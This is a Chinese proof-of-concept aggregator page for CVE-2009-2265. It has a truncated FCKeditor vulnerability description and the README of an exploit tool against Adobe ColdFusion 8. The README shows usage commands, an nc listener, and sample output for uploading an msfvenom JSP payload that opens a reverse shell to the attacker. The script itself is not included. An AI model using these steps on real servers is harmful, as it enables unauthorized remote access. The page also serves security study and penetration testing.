关联漏洞
标题:
FCKeditor 路径遍历漏洞
(CVE-2009-2265)
描述:FCKeditor是个人开发者的一款开源的专用于在网页上编辑HTML的编辑器。 FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在路径遍历漏洞: 147.function FileUpload( $resourceType, $currentFolder ) 148.{ 149.$sErrorNumber = '0' ; 150.$sFileName = '' ; 151. 152.if ( isse
描述
Adobe ColdFusion 8 - Remote Command Execution (RCE)
介绍
# Adobe ColdFusion 8 - Remote Command Execution (RCE) Exploit
### **Overview**
This exploit targets a known vulnerability in Adobe ColdFusion 8 (CVE-2009-2265). It enables remote command execution (RCE) by uploading a malicious JSP payload that establishes a reverse shell connection.
---
### **Exploit Details**
- **CVE**: [CVE-2009-2265](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265)
- **Vulnerability**: Improper handling of file uploads in Adobe ColdFusion 8.
- **Affected Versions**: Adobe ColdFusion 8.
- **Impact**: Allows attackers to execute arbitrary commands on the server.
---
### **Features**
1. Automatically generates a JSP payload using `msfvenom`.
2. Uploads the payload using a multipart POST request.
3. Triggers the payload to establish a reverse shell.
4. Automatically cleans up the local payload files after execution.
---
### **Usage**
To use this exploit, you need the following:
- A Kali Linux machine or a similar penetration testing environment.
- Netcat installed for listening on the specified port.
- A vulnerable Adobe ColdFusion 8 server.
---
### **Command Syntax**
```bash
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
```
#### **Arguments**
- `-l <LHOST>`: Local attacker IP (e.g., 10.10.16.5).
- `-p <LPORT>`: Local attacker port for the reverse shell (e.g., 9001).
- `-r <RHOST>`: Remote target IP (e.g., 10.10.10.11).
- `-q <RPORT>`: Remote target port where ColdFusion is running (e.g., 8500).
---
### **Example Usage**
```bash
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
```
1. Start a listener on your attacker machine:
```bash
nc -lnvp 9001
```
2. Run the exploit with the appropriate arguments.
3. Once executed, the payload will connect back to your listener.
---
### **How It Works**
1. **Generate Payload**:
- The script uses `msfvenom` to generate a malicious JSP payload.
- The payload initiates a reverse shell to the specified LHOST and LPORT.
2. **Upload Payload**:
- The payload is uploaded to the vulnerable ColdFusion server using a POST request.
3. **Trigger Payload**:
- The uploaded payload is executed by sending a GET request to the file's URL.
4. **Establish Reverse Shell**:
- A reverse shell is established, giving the attacker access to the target system.
---
### **Requirements**
- `msfvenom` for payload generation.
- `curl` for file upload and triggering the payload.
- `nc` (Netcat) for listening to reverse shell connections.
---
### **Example Output**
```plaintext
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!
```
---
### **Disclaimer**
This script is for **educational purposes only**. Use it on systems you own or have explicit permission to test. Unauthorized use of this exploit on systems you do not own is illegal and unethical.
---
### **Author**
Developed by [0xDTC].
文件快照
[4.0K] /data/pocs/56b7e5c180efdf6a3fa7719ae0b72e00fa5405f0
├── [3.5K] CVE-2009-2265
└── [3.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。